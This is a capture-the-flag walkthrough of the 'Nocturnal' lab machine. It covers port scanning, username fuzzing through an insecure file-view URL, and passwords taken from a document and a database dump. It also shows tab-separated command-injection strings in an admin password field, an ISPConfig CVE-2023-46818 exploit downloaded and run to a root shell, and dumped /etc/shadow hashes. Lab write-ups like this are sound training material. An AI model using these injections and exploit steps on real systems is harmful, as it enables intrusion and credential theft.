14-Nocturnal

Enum

$ rustscan --ulimit 10000 -a 10.129.72.149 -- -A -sC
 
Open 10.129.72.149:22
Open 10.129.72.149:80
 
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDpf3JJv7Vr55+A/O4p/l+TRCtst7lttqsZHEA42U5Edkqx/Kb8c+F0A4wMCVOMqwyR/PaMdmzAomYGvNYhi3NelwIEqdKKnL+5svrsStqb9XjyShPD9SQK5Su7xBt+/TfJyJFRcsl7ZJdfc6xnNHQITvwa6uZhLsicycj0yf1Mwdzy9hsc8KRY2fhzARBaPUFdG0xte2MkaGXCBuI0tMHsqJpkeZ46MQJbH5oh4zqg2J8KW+m1suAC5toA9kaLgRis8p/wSiLYtsfYyLkOt2U+E+FZs4i3vhVxb9Sjl9QuuhKaGKQN2aKc8ItrK8dxpUbXfHr1Y48HtUejBj+AleMrUMBXQtjzWheSe/dKeZyq8EuCAzeEKdKs4C7ZJITVxEe8toy7jRmBrsDe4oYcQU2J76cvNZomU9VlRv/lkxO6+158WtxqHGTzvaGIZXijIWj62ZrgTS6IpdjP3Yx7KX6bCxpZQ3+jyYN1IdppOzDYRGMjhq5ybD4eI437q6CSL20=
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcnMmaOpYYv5IoOYfwkaYqI9hP6MhgXCT9Cld1XLFLBhT+9SsJEpV6Ecv+d3A1mEOoFL4sbJlvrt2v5VoHcf4M=
|   256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIASsDOOb+I4J4vIK5Kz0oHmXjwRJMHNJjXKXKsW0z/dy
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to 'http://nocturnal.htb/'
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
 
$ echo "10.129.72.149 nocturnal.htb" | sudo tee -a /etc/hosts

Visiting nocturnal.htb

Create account + login

Files restricted to these types:

Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.

Upload a test file

$ touch test.pdf

Discover URL for file

http://nocturnal.htb/view.php?username=asdf&file=test.pdf

Based on URL, FUZZ usernames (need cookie)

Also exclude junk lengths

$ gobuster fuzz -u "http://nocturnal.htb/view.php?username=FUZZ&file=*.odt" -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -c "PHPSESSID=rk5754nbsgaudih4hgljobav8c" --exclude-length 2985
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:              http://nocturnal.htb/view.php?username=FUZZ&file=*.odt
[+] Method:           GET
[+] Threads:          10
[+] Wordlist:         /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
[+] Exclude Length:   2985
[+] Cookies:          PHPSESSID=rk5754nbsgaudih4hgljobav8c
[+] User Agent:       gobuster/3.6
[+] Timeout:          10s
===============================================================
Starting gobuster in fuzzing mode
===============================================================
Found: [Status=200] [Length=3037] [Word=admin] http://nocturnal.htb/view.php?username=admin&file=*.odt
 
Found: [Status=200] [Length=3113] [Word=amanda] http://nocturnal.htb/view.php?username=amanda&file=*.odt
 
Found: [Status=200] [Length=3173] [Word=asdf] http://nocturnal.htb/view.php?username=asdf&file=*.odt
 
Found: [Status=200] [Length=3037] [Word=tobias] http://nocturnal.htb/view.php?username=tobias&file=*.odt

http://nocturnal.htb/view.php?username=amanda&file=*.odt

Download this file and investigate

$ file privacy.odt
privacy.odt: Zip archive, with extra data prepended
 
$ unzip privacy.odt
Archive:  privacy.odt
warning [privacy.odt]:  2919 extra bytes at beginning or within zipfile
  (attempting to process anyway)
 extracting: mimetype
   creating: Configurations2/accelerator/
   creating: Configurations2/images/Bitmaps/
   creating: Configurations2/toolpanel/
   creating: Configurations2/floater/
   creating: Configurations2/statusbar/
   creating: Configurations2/toolbar/
   creating: Configurations2/progressbar/
   creating: Configurations2/popupmenu/
   creating: Configurations2/menubar/
  inflating: styles.xml
  inflating: manifest.rdf
  inflating: content.xml
  inflating: meta.xml
  inflating: settings.xml
 extracting: Thumbnails/thumbnail.png
  inflating: META-INF/manifest.xml
 
$ cat content.xml

*snip*
</text:p><text:p text:style-name="P1">Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.</text:p><text:p text:style-name="P1">The file has been created and provided by Nocturnal&apos;s IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.</text:p><text:p text:style-name="P1">Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.</text:p><text:p text:style-name="P1"/><text:p text:style-name="P1">Yours sincerely,</text:p><text:p text:style-name="P1">Nocturnal&apos;s IT team</text:p></office:text></office:body></office:document-content>

amanda : arHkG7HAI68X8s1J

User

Access admin panel

Review admin.php source to reveal injection in password field (whitespace)

asdf"ls	-la

asdf"ls	-la	../

asdf"ls	-la	~/nocturnal_database

asdf"mv	~/nocturnal_database/nocturnal_database.db	~/

Now backup and download with nocturnal_database.db file added

Inspect database

$ sqlite3 nocturnal_database.db

sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    username TEXT NOT NULL UNIQUE,
    password TEXT NOT NULL
);
INSERT INTO users VALUES(1,'admin','d725aeba143f575736b07e045d8ceebb');
INSERT INTO users VALUES(2,'amanda','df8b20aa0c935023f99ea58358fb63c4');
INSERT INTO users VALUES(4,'tobias','55c82b1ccd55ab219b3b109b07d5061d');
INSERT INTO users VALUES(6,'asdf','912ec803b2ce49e4a541068d495ab570');
CREATE TABLE uploads (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    user_id INTEGER NOT NULL,
    file_name TEXT NOT NULL,
    upload_time DATETIME DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY(user_id) REFERENCES users(id)
);
INSERT INTO uploads VALUES(4,2,'privacy.odt','2024-10-18 02:05:53');
INSERT INTO uploads VALUES(5,6,'test.pdf','2025-04-15 17:29:29');
INSERT INTO uploads VALUES(6,6,'test.pdf','2025-04-15 17:36:46');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('users',6);
INSERT INTO sqlite_sequence VALUES('uploads',6);
COMMIT;
sqlite> .exit

Crack hashes

SSH as tobias : slowmotionapocalypse

$ ssh tobias@nocturnal.htb
tobias@nocturnal:~$ ls
user.txt

Root

tobias@nocturnal:~$ sudo -l
[sudo] password for tobias:
Sorry, user tobias may not run sudo on nocturnal.

No sudo; check network

tobias@nocturnal:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      1 10.129.140.119:50318    1.1.1.1:53              SYN_SENT    on (2.02/2/0)
tcp        0    216 10.129.140.119:22       10.10.14.176:58126      ESTABLISHED on (0.02/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0 127.0.0.53:53           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:68              0.0.0.0:*                           off (0.00/0/0)
udp        0      0 127.0.0.1:52231         127.0.0.53:53           ESTABLISHED off (0.00/0/0)

SSH portfwd and inspect 8080

ssh -L 8080:127.0.0.1:8080 tobias@nocturnal.htb

http://127.0.0.1:8080/login/

Reusing passwords we find $\to$ admin : slowmotionapocalypse

ISPConfig Version: 3.2.10p1

CVE-2023-46818

$ wget https://raw.githubusercontent.com/bipbopbup/CVE-2023-46818-python-exploit/refs/heads/main/exploit.py
 
$ python exploit.py http://127.0.0.1:8080/ admin slowmotionapocalypse
 
[+] Target URL: http://127.0.0.1:8080/
[+] Logging in with username 'admin' and password 'slowmotionapocalypse'
[+] Injecting shell
[+] Launching shell
 
ispconfig-shell$ whoami
root
 
ispconfig-shell$ cat /root/root.txt
 
ispconfig-shell$ cat /etc/shadow
 
root:$6$sJtQT08ZefRr6Awp$DBlWukQpaXmhYmGm52nQIqvRLc9DyXwxbDFM9F87xQcxX7B.e82r2/g7L3KZc4m7ywzuu6KGQsNi6vpguIXvi/:20014:0:99999:7:::
tobias:$6$kg9idJil/duVwNce$/29r1quOnEmdLDmeujzUUioimkjZTR/YqjiIk74u5K4X6N4NouhWoL4d3wQ4DZQpHnqZ1URYVATEb5/gz2AGV1:20014:0:99999:7:::